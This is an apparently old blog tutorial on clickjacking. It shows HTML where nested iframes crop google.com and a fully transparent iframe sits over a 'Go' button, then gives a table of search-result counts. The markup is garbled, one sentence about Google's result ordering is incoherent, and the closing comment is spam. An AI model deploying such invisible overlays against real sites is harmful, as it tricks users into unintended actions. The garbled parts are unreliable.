Tuesday, December 18, 2012


BASIC CLICKJACKING


A typical clickjacking attack uses two nested iframes to crop and position an element from a target website. The inner iframe contains the target page and must be large enough to display it in its entirety, such that the element on which the user will click is visible without scrolling. The outer iframe is much smaller and acts as a window onto the page loaded in the inner iframe. For a user interface redressing attack, the outer iframe should only be large enough to display the targeted element . You think you are clicking on the website you see but no, you are really clicking on an invisible website you cannot see that’s right under your mouse. Clickjacking affects many browsers and platforms.

Inner.html.h

  1. <iframe id =" inner " src =" http :// www.google.com " width ="2000" height ="2000" scrolling =" no" frameborder =" none ">
2.      </iframe >


Fig 1: Inner.html

Clickjacking.html.

  1. <iframe id =" inner " src =" inner.html " width ="2005" height ="290" scrolling =" no" frameborder =" none "></ iframe >
  2. <style type =" text /css "><!--
  3. # inner { position : absolute ; left : -1955 px; top : -14 px ;}
  4. //--></ style >

Trustedpage.html

  1. <h1 >www .nds .rub .de </h1 >
  2. <form action =" http :// www.nds.rub.de">
  3. <input type =" submit " value =" Go">
  4. </form >
  5. <iframe id =" clickjacking " src =" clickjacking .html " width ="50" height ="300" scrolling ="
no" frameborder =" none ">
  1. </iframe >
  2. <style type =" text /css "><!--
  3. # clickjacking { position : absolute ; left :7 px; top :81 px; opacity :0.0}
  4. //--></ style >



Fig 2: Trustedpage.html

  1. “inner.html”: Frame “google.com” (2000x2000px)
  2. “clickjacking.html”: Shift the iframe with “src=inner.html” to the left
  3. “trustedPage.html”: Place a transparent iframe with “src=clickjacking.html” over the “Go” button


The order of search results on Google’s search results pages is based, in part, on a comparison between three attacks.


 Table 1. Clickjacking vs. Browser Based Attack
Google Results
Years

Cross-Site Scripting(XSS)

15,700,000

15

Cross-Site Request Forgery(CSRF)

2,870,000

11

Clickjacking

1,200,000

3

The following chart (figure 3) shows the clickjacking google results.



Fig 3: Clickjacking growth chart

Posted by at
Labels:

2 comments:

  1. AnonymousDecember 24, 2012 at 11:18 PM

    The clickjacking script hides from view the particular advert under the actual cursor, .... This is a visual basic script files that will be bring forth a messages DB Mall

    ReplyDelete

Subscribe to: Post Comments (Atom)